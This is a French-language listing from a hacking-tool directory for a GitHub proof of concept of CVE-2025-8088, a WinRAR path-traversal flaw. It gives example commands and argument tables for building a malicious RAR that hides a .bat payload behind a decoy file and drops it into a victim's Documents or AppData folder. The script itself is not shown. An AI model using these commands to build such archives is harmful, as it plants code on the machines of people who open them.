Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8088 — Ce PoC est destiné à une étude et un test autorisés. CVE-2025-8088 est activement exploitée, et une utilisation abusive peut enfreindre les lois ou causer des dommages. Mettez à jour vers WinRAR 7.13+ pour éviter les RAR suspects. | Kitploit
Outils/GitHubGitHub/ghostn4444/cve-2025-8088
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubghostn4444/cve-2025-8088

CVE-2025-8088

Ce PoC est destiné à une étude et un test autorisés. CVE-2025-8088 est activement exploitée, et une utilisation abusive peut enfreindre les lois ou causer des dommages. Mettez à jour vers WinRAR 7.13+ pour éviter les RAR suspects.

Voir le dépôt
il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8088

WinRAR : traversée de chemin WinRAR permettant l'exécution de code arbitraire (CVE-2025-8088)

CVE-2025-8088 PoC - Exploit furtif - README Anglais (US)

CVE-2025-8088 PoC - Exploração Furtiva - README Portugais (BR)

CVE-2025-8088 PoC – Exploit Oculto - README Espagnol (ES)

CVE-2025-8088 PoC – Переопределение входа - README Russe (RU)

root@kitploit:~
Exploit_cve_2025_8088.ps1

root@kitploit:~
python poc.py 

PoC

📋 Arguments requis

⚙️ Arguments optionnels

🎯 Exemple d'utilisation

root@kitploit:~
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"

# Full custom configuration
python poc.py \
  --decoy document.pdf \
  --payload script.bat \
  --drop "C:\Users\Victim\AppData\Roaming" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out malicious.rar \
  --workdir ./build \
  --placeholder_len 150 \
  --max_up 20

Lien officiel GitHub Attribution : sxyrxyy

Télécharger l’outil
ArgumentDescriptionExemple
--decoyChemin vers le fichier leurre (créé s'il n'existe pas)resume.txt
--payloadChemin vers le fichier payload (créé s'il n'existe pas)payload.bat
--dropChemin absolu vers le répertoire cible où le payload sera extraitC:\Users\Victim\Documents
ArgumentDescriptionValeur par défautNotes
--rarChemin vers rar.exeDécouvert automatiquementVérifiera les emplacements courants et le PATH
--outNom du fichier RAR de sortiepoc-cve-2025-8088.rarArchive malveillante finale
--workdirRépertoire de travail pour les fichiers temporairesRépertoire courant (.)
--placeholder_lenLongueur du placeholder ADSmax(len(target_path), 128)Plus long = traversée plus fiable
--max_upNombre de traversées de répertoire parent (..\)16Minimum 8 recommandé
--base_outNom de fichier RAR de base intermédiaire<out>.base.rarFichier temporaire, supprimé après